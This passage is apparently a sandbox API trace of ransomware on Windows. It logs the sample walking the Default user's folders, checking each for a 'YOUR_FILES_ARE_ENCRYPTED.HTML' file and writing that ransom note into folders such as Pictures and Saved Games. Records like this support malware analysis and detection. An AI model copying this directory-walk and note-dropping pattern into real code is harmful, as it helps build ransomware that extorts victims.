ftLastAccessTime.dwLowDateTime=0x8d5f4e96, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x8d61ae52, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0xa0000003, dwReserved1=0x19f200, cFileName="NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TM.blf", cAlternateFileName="NTUSER~1.BLF")) returned 1 [0110.785] StrStrIW (lpFirst="NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TM.blf", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.785] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TM.blf") returned 76 [0110.785] PathFindExtensionW (pszPath="NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TM.blf") returned=".blf" [0110.785] lstrlenW (lpString=".blf") returned 4 [0110.785] PathFindExtensionW (pszPath="NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TM.blf") returned=".blf" [0110.785] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x8d5f4e96, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x8d5f4e96, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x8d61ae52, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0xa0000003, dwReserved1=0x19f200, cFileName="NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TMContainer00000000000000000001.regtrans-ms", cAlternateFileName="NTUSER~1.REG")) returned 1 [0110.785] StrStrIW (lpFirst="NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TMContainer00000000000000000001.regtrans-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.785] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TMContainer00000000000000000001.regtrans-ms") returned 113 [0110.785] PathFindExtensionW (pszPath="NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TMContainer00000000000000000001.regtrans-ms") returned=".regtrans-ms" [0110.786] lstrlenW (lpString=".regtrans-ms") returned 12 [0110.786] PathFindExtensionW (pszPath="NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TMContainer00000000000000000001.regtrans-ms") returned=".regtrans-ms" [0110.786] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x8d61ae52, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x8d61ae52, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x8d61ae52, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0xa0000003, dwReserved1=0x19f200, cFileName="NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TMContainer00000000000000000002.regtrans-ms", cAlternateFileName="NTUSER~2.REG")) returned 1 [0110.786] StrStrIW (lpFirst="NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TMContainer00000000000000000002.regtrans-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.786] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TMContainer00000000000000000002.regtrans-ms") returned 113 [0110.786] PathFindExtensionW (pszPath="NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TMContainer00000000000000000002.regtrans-ms") returned=".regtrans-ms" [0110.786] lstrlenW (lpString=".regtrans-ms") returned 12 [0110.786] PathFindExtensionW (pszPath="NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TMContainer00000000000000000002.regtrans-ms") returned=".regtrans-ms" [0110.786] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd9eaaa, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x19f200, cFileName="Pictures", cAlternateFileName="")) returned 1 [0110.786] StrStrIW (lpFirst="Pictures", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.786] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\Pictures") returned 29 [0110.786] GetProcessHeap () returned 0x600000 [0110.786] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3173dd8 [0110.786] lstrcpyW (in: lpString1=0x3173dd8, lpString2="\\\\?\\C:\\Users\\Default\\Pictures" | out: lpString1="\\\\?\\C:\\Users\\Default\\Pictures") returned="\\\\?\\C:\\Users\\Default\\Pictures" [0110.786] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\Pictures", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Default\\Pictures\\*") returned="\\\\?\\C:\\Users\\Default\\Pictures\\*" [0110.786] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Pictures\\*", lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd9eaaa, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x620c10, cFileName=".", cAlternateFileName="")) returned 0x626a38 [0110.786] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd9eaaa, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x620c10, cFileName="..", cAlternateFileName="")) returned 1 [0110.786] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd9eaaa, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x620c10, cFileName="..", cAlternateFileName="")) returned 0 [0110.786] FindClose (in: hFindFile=0x626a38 | out: hFindFile=0x626a38) returned 1 [0110.786] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\Pictures\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 59 [0110.786] GetProcessHeap () returned 0x600000 [0110.786] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0110.787] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Pictures\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\default\\pictures\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x314 [0110.787] WriteFile (in: hFile=0x314, lpBuffer=0x3183de0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19f0e0, lpOverlapped=0x0 | out: lpBuffer=0x3183de0*, lpNumberOfBytesWritten=0x19f0e0*=0x3c00, lpOverlapped=0x0) returned 1 [0110.788] CloseHandle (hObject=0x314) returned 1 [0110.789] GetProcessHeap () returned 0x600000 [0110.789] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0110.789] GetProcessHeap () returned 0x600000 [0110.789] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3173dd8 | out: hHeap=0x600000) returned 1 [0110.789] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x5d599f22, ftCreationTime.dwHighDateTime=0x1d7005f, ftLastAccessTime.dwLowDateTime=0x5d599f22, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0x5d599f22, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x19f200, cFileName="PrintHood", cAlternateFileName="PRINTH~1")) returned 1 [0110.789] StrStrIW (lpFirst="PrintHood", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.789] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\PrintHood") returned 30 [0110.789] GetProcessHeap () returned 0x600000 [0110.789] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3173dd8 [0110.790] lstrcpyW (in: lpString1=0x3173dd8, lpString2="\\\\?\\C:\\Users\\Default\\PrintHood" | out: lpString1="\\\\?\\C:\\Users\\Default\\PrintHood") returned="\\\\?\\C:\\Users\\Default\\PrintHood" [0110.790] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\PrintHood", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Default\\PrintHood\\*") returned="\\\\?\\C:\\Users\\Default\\PrintHood\\*" [0110.790] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\PrintHood\\*", lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd9eaaa, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x620c10, cFileName="..", cAlternateFileName="翿")) returned 0xffffffff [0110.790] GetProcessHeap () returned 0x600000 [0110.790] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3173dd8 | out: hHeap=0x600000) returned 1 [0110.790] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x5d599f22, ftCreationTime.dwHighDateTime=0x1d7005f, ftLastAccessTime.dwLowDateTime=0x5d599f22, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0x5d599f22, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x19f200, cFileName="Recent", cAlternateFileName="")) returned 1 [0110.791] StrStrIW (lpFirst="Recent", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.791] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\Recent") returned 27 [0110.791] GetProcessHeap () returned 0x600000 [0110.791] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3173dd8 [0110.791] lstrcpyW (in: lpString1=0x3173dd8, lpString2="\\\\?\\C:\\Users\\Default\\Recent" | out: lpString1="\\\\?\\C:\\Users\\Default\\Recent") returned="\\\\?\\C:\\Users\\Default\\Recent" [0110.791] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\Recent", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Default\\Recent\\*") returned="\\\\?\\C:\\Users\\Default\\Recent\\*" [0110.791] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Recent\\*", lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd9eaaa, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x620c10, cFileName="..", cAlternateFileName="翿")) returned 0xffffffff [0110.791] GetProcessHeap () returned 0x600000 [0110.791] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3173dd8 | out: hHeap=0x600000) returned 1 [0110.791] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd9eaaa, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x19f200, cFileName="Saved Games", cAlternateFileName="SAVEDG~1")) returned 1 [0110.791] StrStrIW (lpFirst="Saved Games", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.791] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\Saved Games") returned 32 [0110.791] GetProcessHeap () returned 0x600000 [0110.791] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3173dd8 [0110.792] lstrcpyW (in: lpString1=0x3173dd8, lpString2="\\\\?\\C:\\Users\\Default\\Saved Games" | out: lpString1="\\\\?\\C:\\Users\\Default\\Saved Games") returned="\\\\?\\C:\\Users\\Default\\Saved Games" [0110.792] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\Saved Games", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Default\\Saved Games\\*") returned="\\\\?\\C:\\Users\\Default\\Saved Games\\*" [0110.792] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Saved Games\\*", lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd9eaaa, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x620c10, cFileName=".", cAlternateFileName="")) returned 0x626a38 [0110.793] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd9eaaa, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x620c10, cFileName="..", cAlternateFileName="")) returned 1 [0110.793] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd9eaaa, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x620c10, cFileName="..", cAlternateFileName="")) returned 0 [0110.793] FindClose (in: hFindFile=0x626a38 | out: hFindFile=0x626a38) returned 1 [0110.793] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\Saved Games\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 62 [0110.793] GetProcessHeap () returned 0x600000 [0110.793] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0110.793] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Saved Games\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\default\\saved games\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x314 [0110.793] WriteFile (in: hFile=0x314, lpBuffer=0x3183de0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19f0e0, lpOverlapped=0x0 | out: lpBuffer=0x3183de0*, lpNumberOfBytesWritten=0x19f0e0*=0x3c00, lpOverlapped=0x0) returned 1 [0110.794] CloseHandle (hObject=0x314) returned 1 [0110.795] GetProcessHeap () returned 0x600000 [0110.795] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0110.795] GetProcessHeap () returned 0x600000 [0110.795] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3173dd8 | out: hHeap=0x600000) returned 1 [0110.795] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x5d599f22, ftCreationTime.dwHighDateTime=0x1d7005f, ftLastAccessTime.dwLowDateTime=0x5d599f22, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0x5d599f22, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x19f200, cFileName="SendTo", cAlternateFileName="")) returned 1 [0110.795] StrStrIW (lpFirst="SendTo", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.795] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\SendTo") returned 27 [0110.795] GetProcessHeap () returned 0x600000 [0110.795] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3173dd8 [0110.796] lstrcpyW (in: lpString1=0x3173dd8, lpString2="\\\\?\\C:\\Users\\Default\\SendTo" | out: lpString1="\\\\?\\C:\\Users\\Default\\SendTo") returned="\\\\?\\C:\\Users\\Default\\SendTo" [0110.796] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\SendTo", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Default\\SendTo\\*") returned="\\\\?\\C:\\Users\\Default\\SendTo\\*" [0110.796] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\SendTo\\*", lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd9eaaa, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x620c10, cFileName="..", cAlternateFileName="翿")) returned 0xffffffff [0110.796] GetProcessHeap () returned 0x600000 [0110.796] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3173dd8 | out: hHeap=0x600000) returned 1 [0110.796] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x5d599f22, ftCreationTime.dwHighDateTime=0x1d7005f, ftLastAccessTime.dwLowDateTime=0x5d599f22, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0x5d599f22, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x19f200, cFileName="Start Menu", cAlternateFileName="STARTM~1")) returned 1 [0110.796] StrStrIW (lpFirst="Start Menu", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.796] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\Start Menu") returned 31 [0110.796] GetProcessHeap () returned 0x600000 [0110.796] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3173dd8 [0110.796] lstrcpyW (in: lpString1=0x3173dd8, lpString2="\\\\?\\C:\\Users\\Default\\Start Menu" | out: lpString1="\\\\?\\C:\\Users\\Default\\Start Menu") returned="\\\\?\\C:\\Users\\Default\\Start Menu" [0110.796] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\Start Menu", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Default\\Start Menu\\*") returned="\\\\?\\C:\\Users\\Default\\Start Menu\\*" [0110.796] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Start Menu\\*", lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd9eaaa, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x620c10, cFileName="..", cAlternateFileName="翿")) returned 0xffffffff [0110.797] GetProcessHeap () returned 0x600000 [0110.797] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3173dd8 | out: hHeap=0x600000) returned 1 [0110.797] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x5d599f22, ftCreationTime.dwHighDateTime=0x1d7005f, ftLastAccessTime.dwLowDateTime=0x5d599f22, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0x5d599f22, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x19f200, cFileName="Templates", cAlternateFileName="TEMPLA~1")) returned 1 [0110.797] StrStrIW (lpFirst="Templates", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.797] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\Templates") returned 30 [0110.797] GetProcessHeap () returned 0x600000 [0110.797] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3173dd8 [0110.798] lstrcpyW (in: lpString1=0x3173dd8, lpString2="\\\\?\\C:\\Users\\Default\\Templates" | out: lpString1="\\\\?\\C:\\Users\\Default\\Templates") returned="\\\\?\\C:\\Users\\Default\\Templates" [0110.798] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\Templates", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Default\\Templates\\*") returned="\\\\?\\C:\\Users\\Default\\Templates\\*" [0110.798] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Templates\\*", lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd9eaaa, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x620c10, cFileName="..", cAlternateFileName="翿")) returned 0xffffffff [0110.799] GetProcessHeap () returned 0x600000 [0110.799] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3173dd8 | out: hHeap=0x600000) returned 1 [0110.799] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd9eaaa, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x19f200, cFileName="Videos", cAlternateFileName="")) returned 1 [0110.799] StrStrIW (lpFirst="Videos", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.799] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\Videos") returned 27 [0110.799] GetProcessHeap () returned 0x600000 [0110.799] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3173dd8 [0110.799] lstrcpyW (in: lpString1=0x3173dd8, lpString2="\\\\?\\C:\\Users\\Default\\Videos" | out: lpString1="\\\\?\\C:\\Users\\Default\\Videos") returned="\\\\?\\C:\\Users\\Default\\Videos" [0110.799] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\Videos", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Default\\Videos\\*") returned="\\\\?\\C:\\Users\\Default\\Videos\\*" [0110.799] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Videos\\*", lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd9eaaa, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x620c10, cFileName=".", cAlternateFileName="")) returned 0x6266f8 [0110.799] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd9eaaa, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x620c10, cFileName="..", cAlternateFileName="")) returned 1 [0110.799] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x11, 